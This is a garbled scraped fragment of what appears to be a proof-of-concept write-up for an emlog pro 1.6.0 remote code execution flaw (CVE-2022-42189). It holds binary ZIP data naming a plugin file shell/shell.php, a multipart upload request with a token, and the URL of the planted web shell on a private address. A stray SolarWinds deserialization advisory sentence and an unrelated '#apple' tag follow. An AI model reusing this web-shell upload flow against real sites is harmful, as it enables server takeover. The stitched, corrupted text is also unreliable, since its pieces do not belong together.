    AA噣霿扉┹Rq絓茇?cgf?PK���     Bq=U            �   shell/PK��? �   � Mq=Ua郵/?    �  � $               shell/shell.php
           � � F柑)视?F柑)视?�[秤?PK��? �     Bq=U            � $       �   *�  shell/
           � � 棦��视?�8?视?纳�爻迂�PK��    � � ?   N�    
    ------WebKitFormBoundary804UeairFtrET9Lt
    Content-Disposition: form-data; name="token"
    
    4e1bef9d513bae43a46448cbbaee0db7d1d5f7d1
    ------WebKitFormBoundary804UeairFtrET9Lt--
    
    

    http://192.168.111.155//emlog/content/plugins/shell/shell.php

CVE-2022-42189: cms_vul/emlog_pro_1.6.0_rce.md at main · wszdhf/cms_vul

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.

Tag

#apple